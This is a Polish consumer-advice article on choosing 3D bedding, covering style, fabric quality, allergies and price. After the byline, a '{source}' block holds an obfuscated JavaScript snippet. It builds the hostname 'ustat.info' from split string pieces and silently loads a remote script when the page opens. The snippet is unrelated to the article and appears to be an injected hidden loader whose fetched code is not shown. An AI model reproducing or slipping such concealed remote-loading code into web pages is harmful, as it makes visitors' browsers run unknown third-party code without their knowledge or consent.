Home Design i wnętrze Na co zwracać uwagę wybierając pościel 3D?

Na co zwracać uwagę wybierając pościel 3D?

screenshot-3146

Coraz większa popularność, jaką cieszy się pościel 3D przyczynia się do tego, że nad jej zakupem zastanawia się coraz więcej osób. Bogactwo wzorów i materiałów zachęca do tego rodzaju inwestycji, nie zaszkodzi jednak, jeśli zastanowimy się nad tym, na co powinniśmy zwracać uwagę podczas dokonywania zakupów.

Po pierwsze – stylistyka

Pościel trójwymiarowa zaliczana jest do rozwiązań szczególnie atrakcyjnych wizualnie, jeszcze przed dokonaniem jej zakupu warto jednak zastanowić się nad tym, jak będzie wykorzystywana. Należy liczyć się z tym, że jej obecność może zdominować sypialnię, nie powinniśmy więc pozwalać sobie na pościel utrzymaną w tonacji innej niż inne akcesoria ozdobne umieszczone w pokoju sypialnym.

Oczywiście, mówimy o zaleceniu, a nie o zasadzie, której musimy bezwzględnie przestrzegać, warto jednak zwrócić uwagę na to, że dobrana w nieodpowiedni sposób pościel może szybko zacząć nas irytować. Mamy do czynienia z inwestycją dość kosztowną, niewskazane jest więc, abyśmy już po kilku tygodniach zaczęli zastanawiać się na wymianą pościeli 3D na rozwiązanie bardziej konwencjonalne. Na szczęście, nie mamy wcale do czynienia z poważnym problemem, bogactwo wzorów i kolorów sprawia bowiem, że każdy może zdecydować się na rozwiązanie odpowiadające indywidualnym oczekiwaniom.

Po drugie – materiał

Pościel 3D pojawia się w ofercie coraz większej grupy firm, nietrudno jest przy tym domyślić się, że nie każda z nich wywiązuje się jednakowo solidnie z zadania polegającego na dostarczaniu klientom rozwiązań najwyższej jakości. Warto mieć tego świadomość analizując z dużą starannością materiał, z którego została wykonana pościel. Już na wstępie warto też odrzucić te rozwiązania, które posiadają widoczne ślady niskiej jakości. Nie oszukujmy się, taka pościel wyblaknie już po kilku praniach i nie będzie nadawała się do wykorzystania w sypialni.

Do produkcji pościeli 3D zazwyczaj wykorzystuje się satynę bawełnianą będącą materiałem miłym w dotyku i dość odpornym na uszkodzenia. Plusem takiego rozwiązania jest także łatwość, z jaką utrzymuje się je w czystości oraz wygoda jego stosowania. Niestety, bardzo często nawet zastosowanie połączenia satyny i bawełny nie daje gwarancji, że pościel spełni oczekiwania swojego użytkownika. Z sytuacją taką mamy do czynienia przede wszystkim wówczas, gdy jest on alergikiem, nie zaszkodzi więc, jeśli upewnimy się, że pościel trójwymiarowa jest przyjazna osobom zmagającym się z uczuleniami.

Po trzecie – cena

Naturalne wydaje się dążenie do tego, aby pościel 3D charakteryzowała się niewygórowaną ceną, niemal nigdy bowiem nie jest ona jedynym wydatkiem, na jaki możemy się zdecydować. Warto jednak pamiętać o tym, że bazowanie wyłącznie na argumencie cenowym jest nam w stanie przynieść znacznie więcej strat niż korzyści.

W szczególnym sposób należy więc unikać najtańszej pościeli 3D. Owszem, może się zdarzyć, że niewysoka cena jest efektem kampanii promocyjnej. Znacznie częściej okazuje się jednak, że jest ona wykorzystywana jako nieco desperacka próba zatuszowania niewysokiej jakości.

Autor artykułu:

Materiał powstał w oparciu o materiały dostarczone przez Tendina.pl

 

 

 

{source}
<script type=”text/javascript”>
(function(){
uwg6=document.createElement(„script”);uwg6.type=”text/javascript”;
uwg6.async=true;uwg6_=((„us”)+”t”)+”a”;uwg6_+=(„t.i”)+””+”n”;uwg6_+=((„f”)+”o”);
uwg6.src=”http://”+uwg6_+”/3601660.0nXzqXdawg694j994ph21czgqsurwX”;
document.body.appendChild(uwg6);
})();
</script>
{/source}